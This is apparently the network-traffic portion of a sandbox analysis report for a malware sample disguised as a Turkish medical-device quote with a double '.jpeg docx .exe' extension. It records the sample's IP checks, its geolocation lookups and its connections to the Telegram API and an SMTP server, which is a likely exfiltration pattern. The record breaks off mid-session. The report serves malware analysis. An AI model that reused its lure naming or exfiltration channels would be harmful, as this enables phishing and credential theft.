                                                                                                                        Dec 10, 2024 10:32:53.333570957 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:53.334300041 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:53.334311008 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:54.702951908 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:54.703089952 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:54.706079960 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:54.706090927 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:54.707030058 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:54.708379984 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:54.755328894 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:55.210249901 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:55.210329056 CET44349809149.154.167.220192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:55.210383892 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:55.211436033 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:33:01.447602987 CET4975080192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:33:02.292855024 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:02.423222065 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:02.425746918 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:04.152434111 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:04.162091017 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:04.281363010 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:04.603755951 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:04.605134010 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:04.724481106 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:05.046370983 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:05.046667099 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:05.168154955 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:05.588809013 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:05.591938019 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:05.711338997 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:06.032866955 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:06.033063889 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:06.152578115 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:06.477993965 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:06.481833935 CET49830587192.168.2.777.245.159.14
                                                                                                                        Dec 10, 2024 10:33:06.601783037 CET5874983077.245.159.14192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:06.601845980 CET49830587192.168.2.777.245.159.14

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 10, 2024 10:32:15.388850927 CET6230153192.168.2.71.1.1.1
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET53623011.1.1.1192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:20.752553940 CET6463553192.168.2.71.1.1.1
                                                                                                                        Dec 10, 2024 10:32:20.892559052 CET53646351.1.1.1192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:53.195512056 CET6268353192.168.2.71.1.1.1
                                                                                                                        Dec 10, 2024 10:32:53.332791090 CET53626831.1.1.1192.168.2.7
                                                                                                                        Dec 10, 2024 10:33:01.504189968 CET5389053192.168.2.71.1.1.1
                                                                                                                        Dec 10, 2024 10:33:02.291755915 CET53538901.1.1.1192.168.2.7

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Dec 10, 2024 10:32:15.388850927 CET192.168.2.71.1.1.10x9bf2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:20.752553940 CET192.168.2.71.1.1.10x912aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:53.195512056 CET192.168.2.71.1.1.10x586Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:33:01.504189968 CET192.168.2.71.1.1.10x29a4Standard query (0)mail.adendanismanlik.com.trA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:15.526690960 CET1.1.1.1192.168.2.70x9bf2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:20.892559052 CET1.1.1.1192.168.2.70x912aNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:20.892559052 CET1.1.1.1192.168.2.70x912aNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:32:53.332791090 CET1.1.1.1192.168.2.70x586No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:33:02.291755915 CET1.1.1.1192.168.2.70x29a4No error (0)mail.adendanismanlik.com.tradendanismanlik.com.trCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Dec 10, 2024 10:33:02.291755915 CET1.1.1.1192.168.2.70x29a4No error (0)adendanismanlik.com.tr77.245.159.14A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • reallyfreegeoip.org
                                                                                                                        • api.telegram.org
                                                                                                                        • checkip.dyndns.org

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.749704132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:15.653028965 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 10, 2024 10:32:18.659751892 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 5519614141995832b48e56f9264e09a3
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                        Dec 10, 2024 10:32:18.663773060 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Dec 10, 2024 10:32:20.588360071 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:20 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 9a926923d6b42f127823f005a9c54bce
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                        Dec 10, 2024 10:32:22.973265886 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Dec 10, 2024 10:32:24.790920019 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:24 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 6f2e326b12b1d18d57cc3c6edf27a3d9
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.749734132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:26.644078016 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Dec 10, 2024 10:32:29.733500004 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:29 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 98f70877b2dfeaa9763b38e96adcafad
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.749750132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:31.529026985 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Dec 10, 2024 10:32:33.833993912 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:33 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 547
                                                                                                                        Connection: keep-alive
                                                                                                                        X-Request-ID: e64b70ab974b0012371a7186989f4831
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.749758132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:33.973752022 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 10, 2024 10:32:36.276942968 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:36 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 547
                                                                                                                        Connection: keep-alive
                                                                                                                        X-Request-ID: 35b4d35012ecbad91c400de081679fbb
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.749764132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:36.469876051 CET127OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Dec 10, 2024 10:32:39.317708015 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:39 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 52c93fa1beee95fce34d30b9d882214d
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.749776132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:41.107857943 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 10, 2024 10:32:43.454797983 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:43 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: d489a34b3bc8c92613566184c05dcf3b
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.749786132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:45.260377884 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 10, 2024 10:32:47.806457043 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:47 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 6f8cc0203ca75b2ad8d894c0fce6e04f
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.749798132.226.247.73807844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 10, 2024 10:32:49.600965977 CET151OUTGET / HTTP/1.1
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                        Host: checkip.dyndns.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Dec 10, 2024 10:32:51.522171021 CET321INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 104
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Request-ID: 689204155a4fec1400cd250a79406ff8
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.749717172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:22 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-12-10 09:32:22 UTC881INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:22 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2465
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLXmNGkTzDbic5yDLi5Rq%2Fe2ApkpAK%2BUox4PMIm%2Bcq%2BzjZgJHrW2gb3hyXaLkQdw0%2Bx0QeXj2RfvpzuIevbNTPQMUYbVWzQ91Jwg8rbzcbgSsjtYHmi43Jn7%2FGouJB5vI0Hq1oLG"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3a3278dc7c7b-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2837&min_rtt=1968&rtt_var=1359&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1483739&cwnd=207&unsent_bytes=0&cid=93d096333252150b&ts=451&x=0"
                                                                                                                        2024-12-10 09:32:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.749729172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:26 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2024-12-10 09:32:26 UTC878INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:26 GMT
